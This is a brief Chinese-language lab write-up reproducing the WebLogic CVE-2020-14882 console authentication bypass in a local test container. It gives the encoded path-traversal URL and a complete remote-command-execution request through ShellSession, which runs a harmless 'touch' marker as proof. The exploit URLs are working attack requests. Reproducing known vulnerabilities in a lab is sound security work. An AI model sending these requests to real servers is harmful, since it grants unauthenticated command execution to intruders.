环境搭建
访问http://192.168.43.8:7001/console即可查看到后台登录页面
绕过认证直接访问后台
首先测试权限绕过漏洞(CVE-2020-14882),直接访问
http://192.168.43.8:7001/console/css/%252e%252e%252fconsole.portal
直接访问如下URL,即可利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")
进入容器后到执行命令的目录下查看文件夹是否创建
可以看到success1成功创建,命令执行成功